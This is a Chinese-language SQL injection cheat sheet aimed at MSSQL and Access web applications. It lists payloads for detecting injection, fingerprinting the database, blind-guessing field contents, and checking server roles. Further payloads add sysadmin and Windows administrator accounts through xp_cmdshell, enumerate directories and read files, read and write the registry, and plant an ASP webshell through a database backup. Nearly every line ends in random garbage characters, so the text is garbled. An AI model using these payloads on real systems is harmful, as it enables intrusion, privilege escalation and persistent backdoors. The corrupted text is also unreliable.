1.判断是否有注入;and 1=1 ;and 1=2 4G@v�O��{$
2.初步判断是否是mssql ;and user>0 ,ye�>��D='
%g0"Kj�5�
3.注入参数是字符'and [查询条件] and ''=' HHC�sWe�-�
Fx�0K.Q2Y0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 8b�(Uq��yV
��;M�Cv��
5.判断数据库系统 dj�?.Hc7od
u-�p�E�
;|
;and (select count(*) from sysobjects)>0 mssql A��8�6#�7�
|�>�A�1J�:
;and (select count(*) from msysobjects)>0 access �u�$&�7fmZ
aAw�nkQ$�
}o=R7�n%�
Gc4N)oq)}b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 h^~eTi;c]Q
�~0|�~�Fg
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 L`x:Y>C(
�_"a�(vfl#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 {���+z+6i�
gO�4�J�[�_
9.(1)猜字段的ascii值(access) X+P&
u�p06
��E`�XUK,b
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 3l`y�y])�t
�[��G[HQ)A
(2)猜字段的ascii值(mssql) b\][ x6zJp
0F�jSa\Z�H
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <3
AkF# C9
�i��dPkJf/
10.测试权限结构(mssql) i�{�T0[\4�
2*Z~J����M
P)�^K&�7X�
;r-
\h1iA'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]Vl�*�!,(i
��%��I(��N
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Y$Js5��K@F
#g{ZfO[#�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- KTB�sH;��6
�[ #A!B#`�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �6N�~~:Gt
yXppu���[=
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- M)I�&^mm39
\�KL�WOj�%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- x�l�gN��}M
\ z�hT1#�O
;and 1=(select IS_MEMBER('db_owner'));-- �H�]UM2.��
�Q�go0uu�M
l�x �U}HM�
}v0oFY$u`H
11.添加mssql和系统的帐户 �sUfH1w)0�
!7AW�_l9`i
;exec master.dbo.sp_addlogin username;-- ��<|h�v��H
;exec master.dbo.sp_password null,username,password;-- BA A)�IQ�F
}n�:��'@�}
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- UG&/0{j5XV
�G�}BO!�Z6
;exec master.dbo.xp_cmdshell 'net user username password Tp)-L0kD_k
�f*1.Vg0`-
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2z����tP�'
jp=^$rS6�[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- x?va26F�V
bH3-#m�w5w
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �lY.FmF�}k
mZ7.#R*�}
lm�j7�3OB3
d@7
]=�P�:
12.(1)遍历目录 W��kXa%�OZ
��2P!Pb�l<
;create table dirs(paths varchar(100), id int) �s7(�m�Npo
f/*Xw��{s#
;insert dirs exec master.dbo.xp_dirtree 'c:\' �_D$|�lk-
Ga.�a"\F.V
;and (select top 1 paths from dirs)>0 ��9N5�&N3�
!j%v��Ue;t
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��@,�i:�fY
=MB[v/M59w
m�Ak)�9`f/
|��"5NI'X?
(2)遍历目录 e��DX{}Dq(
EXS
1.3��>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- y''`�7�3U"
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 p8%�x@%k�
::9U5E;��!
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �+QtK
"5M
�ojT TYR�{
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 `L]cJ0t�As
rzLpVp�Taz
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 C�b����x�/
*S:^�3{.m=
;pBSGr��9
�&P&�M6�v+
13.mssql中的存储过程 Zh�{Pzyp�
80![aj}z4G
xp_regenumvalues 注册表根键, 子键 -�%��5*c61
�B�r`Xw^�S
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �&h�`��s:Y
[Sg1\UTl�
xp_regread 根键,子键,键值名 &Jk0SUk MP
8JJq�Ek�Q�
;exec xp_regread s�34{\/'D+
Gi6�s�l_"q
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3-lJ]�7�OT
S'9T>&<K�n
xp_regwrite 根键,子键, 值名, 值类型, 值 �/�/3ia�i�
�FU;Tv��).
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �r��_@;�eh
M�//�q7SHh
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 (6�^v`SZ��
��Al��5E�
xp_regdeletevalue 根键,子键,值名 r�s]%`"�&=
yS@c2I602�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 q$(a�MO&J�
k9~NI�vnB`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �!L2R�0Y:a
L1VUfEG��-
�l"f.eo0@7
d2�Z�5HFtY
14.mssql的backup创建webshell 4s�P0�oe[h
PL@hsZty~c
use model vCb3Ra~L�`
)%-���FnW�
create table cmd(str image); =Xzrm���Pu
\v)Dy)Vhg2
insert into cmd(str) values (''); QpB�g�G~h"
:p�;!\�4)u
backup database model to disk='c:\l.asp'; �Ew*_@h�VC
�Oq��7M1|{
V\W�?@V9g-
x{*�g�^��f
15.mssql内置函数 �kl?U�2A.=
re2M!m6�k5
;and (select @@version)>0 获得Windows的版本号 f�<=�<:�+
fFMGpibk�M
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ='`���z��
Y4��_�/G4C
;and (select user_name())>0 爆当前系统的连接用户 �F@1~�aeX-
.�__XOd}�K
;and (select db_name())>0 得到当前连接的数据库 @i'�R�IL}�
Q�})x4���
��Ynl��^Z
A5S9F8Q/]
16.简洁的webshell �1�p[C5j3
64��%P}On�
use model ` .|JTm�[�
[a:y��KJ[
create table cmd(str image); ,|D_�? D)U
(#k>�cA(}�
insert into cmd(str) values (''); ��]��JVs/�
4/;hA
�z�
backup database model to disk='g:\wwwtest\l.asp';
